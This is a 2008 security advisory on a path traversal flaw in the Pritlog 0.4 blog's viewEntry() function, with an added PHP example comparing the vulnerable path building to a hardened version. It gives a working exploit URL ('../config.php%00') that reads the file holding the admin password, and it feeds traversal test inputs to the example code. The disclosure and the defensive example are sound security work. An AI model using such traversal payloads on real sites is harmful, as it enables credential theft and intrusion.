SECURITYVULNS:DOC:20641
Oct 02, 2008 - 12:00 a.m.

Printlog <= 0.4: Remote File Edition Vulnerability

2008-10-02 00:00:00
vulners.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog

Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

– Description (by the author's page) –
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.

– Bug –
You can navigate and view the entries with a URL like:
http://localhost/p/index.php?option=viewEntry&filename=00001

The code doesn't check the filename parameter before using it to build the path:

  function viewEntry() {
    // filename is taken straight from the request, POST or GET
    $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
    global $postdir, $separator, $newPostFile, $newFullPostNumber,
      $debugMode, $config_textAreaCols, $config_textAreaRows;
    global $config_allowComments, $config_commentsSecurityCode,
      $config_CAPTCHALength, $config_randomString;
    global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
    // the unchecked value is concatenated directly into the file path
    $viewFileName=$postdir.$fileName.$config_dbFilesExtension;

– Exploit –
If magic quotes are off you can do:
http://localhost/p/index.php?option=viewEntry&filename=../config.php%00

config.php contains the admin password.
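For comparison, the path construction from viewEntry() above next to a hardened version. This is an added example, not Pritlog's own code; the posts directory, the file extension and the five-digit entry name format are assumptions.

```php
<?php
// Added example (not part of the original advisory or of Pritlog).
// Assumptions: posts live under ./db/posts/ and use the .txt extension.
$postdir = __DIR__ . '/db/posts/';
$config_dbFilesExtension = '.txt';

// Same pattern as the vulnerable viewEntry(): the request value is glued
// straight into the path, so "../" segments leave $postdir and a NUL byte
// (with magic quotes off, on PHP versions that truncate at NUL) drops the
// extension that was meant to restrict which files can be opened.
function unsafeEntryPath($fileName, $postdir, $ext) {
    return $postdir . $fileName . $ext;
}

// Hardened: entries are named like 00001, so accept exactly that shape and
// nothing else (rejects "../", NUL bytes, absolute paths), then confirm the
// resolved path is still inside the posts directory as a second check.
function safeEntryPath($fileName, $postdir, $ext) {
    if (!is_string($fileName) || !preg_match('/^[0-9]{5}\z/', $fileName)) {
        return null;                         // malformed entry name
    }
    $base = realpath($postdir);
    $path = realpath($postdir . $fileName . $ext);
    if ($base === false || $path === false) {
        return null;                         // directory or entry missing
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                         // resolved outside $postdir
    }
    return $path;
}

// Constructed inputs: a normal entry, the advisory's value, a deeper traversal.
foreach (['00001', "../config.php\0", '../../etc/passwd'] as $name) {
    $unsafe = unsafeEntryPath($name, $postdir, $config_dbFilesExtension);
    $safe   = safeEntryPath($name, $postdir, $config_dbFilesExtension);
    printf("%-20s unsafe=%s safe=%s\n",
        addcslashes($name, "\0"),
        addcslashes($unsafe, "\0"),
        var_export($safe, true));
}
```

The whitelist check runs before any filesystem call, so a NUL byte never reaches realpath(); the containment check catches anything a future change to the name format might let through.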